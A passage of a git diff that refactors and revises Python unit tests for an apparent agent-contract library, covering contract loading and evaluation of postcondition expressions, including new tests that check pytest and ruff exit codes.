tmp_yaml(tier0_data) + contract = load_contract(path) + assert contract.source_path == str(path.resolve()) def test_strict_validation_raises(self, tmp_yaml) -> None: bad_data = {"agent_contract": "bad", "identity": {"name": "a"}} @@ -127,13 +132,11 @@ def test_non_strict_returns_partial(self, tmp_yaml) -> None: "identity": {"name": "partial", "version": "0.0.1"}, "contract": {"postconditions": [{"name": "x", "check": "true"}]}, } - path = tmp_yaml(partial) - contract = load_contract(path, strict=False) + contract = load_contract(tmp_yaml(partial), strict=False) assert contract.identity.name == "partial" def test_raw_preserved(self, tmp_yaml, tier0_data: Dict[str, Any]) -> None: tier0_data["x-custom"] = "value" - path = tmp_yaml(tier0_data) - contract = load_contract(path) + contract = load_contract(tmp_yaml(tier0_data)) assert contract.raw is not None assert contract.raw["x-custom"] == "value" diff --git a/tests/test_postconditions.py b/tests/test_postconditions.py index b437be4..df9d875 100644 --- a/tests/test_postconditions.py +++ b/tests/test_postconditions.py @@ -32,10 +32,6 @@ def test_equality(self) -> None: assert evaluate_expression('output.status == "resolved"', ctx) is True assert evaluate_expression('output.status == "failed"', ctx) is False - def test_inequality(self) -> None: - ctx = {"output": {"status": "resolved"}} - assert evaluate_expression('output.status != "failed"', ctx) is True - def test_numeric_comparison(self) -> None: ctx = {"output": {"score": 0.85}} assert evaluate_expression("output.score >= 0.8", ctx) is True @@ -59,9 +55,10 @@ def test_nested_path(self) -> None: ctx = {"output": {"data": {"nested": {"value": 42}}}} assert evaluate_expression("output.data.nested.value == 42", ctx) is True - def test_missing_path_returns_false(self) -> None: - ctx = {"output": {}} - assert evaluate_expression("output.nonexistent is not None", ctx) is False + def test_logical_and_or(self) -> None: + ctx = {"checks": {"pytest": {"exit_code": 0}, "ruff": {"exit_code": 1}}} + assert evaluate_expression("checks.pytest.exit_code == 0 and checks.ruff.exit_code == 1", ctx) is True + assert evaluate_expression("checks.pytest.exit_code == 1 or checks.ruff.exit_code == 1", ctx) is True def test_truthiness_fallback(self) -> None: assert evaluate_expression("output", {"output": "nonempty"}) is True @@ -84,27 +81,24 @@ def test_sync_warn_calls_callback(self) -> None: warnings: list = [] pcs = [PostconditionDef(name="warn_check", check='output == "good"', enforcement="sync_warn")] results = evaluate_postconditions(pcs, "bad", on_warn=lambda pc, o: warnings.append(pc.name)) - assert len(warnings) == 1 - assert warnings[0] == "warn_check" + assert warnings == ["warn_check"] assert results[0].passed is False - def test_async_monitor_deferred(self) -> None: - async_items: list = [] - pcs = [PostconditionDef(name="async_check", check="output > 0", enforcement="async_monitor")] - results = evaluate_postconditions(pcs, -1, on_async=lambda pc, o: async_items.append(pc.name)) - assert len(async_items) == 1 - # async_monitor always returns passed=True (deferred evaluation) - assert results[0].passed is True - def test_eval_judge_skipped(self) -> None: pcs = [PostconditionDef(name="judge", check="eval:quality_judge", enforcement="sync_block")] - results = evaluate_postconditions(pcs, "anything") - assert results[0].passed is True # Skipped, not evaluated + assert evaluate_postconditions(pcs, "anything")[0].passed is True - def test_multiple_postconditions(self) -> None: + def test_checks_context(self) -> None: pcs = [ - PostconditionDef(name="not_none", check="output is not None", enforcement="sync_block"), - PostconditionDef(name="has_data", check='output.status == "ok"', enforcement="sync_warn"), + PostconditionDef( + name="repo_checks_green", + check="checks.pytest.exit_code == 0 and checks.ruff.exit_code == 0", + enforcement="sync_block", + ) ] - results = evaluate_postconditions(pcs, {"status": "ok"}) - assert all(r.passed for r in results) + results = evaluate_postconditions( + pcs, + {"status": "done"}, + extra_context={"checks": {"pytest": {"exit_code": 0}, "ruff": {"exit_code": 0}}}, + ) + assert results[0].passed is True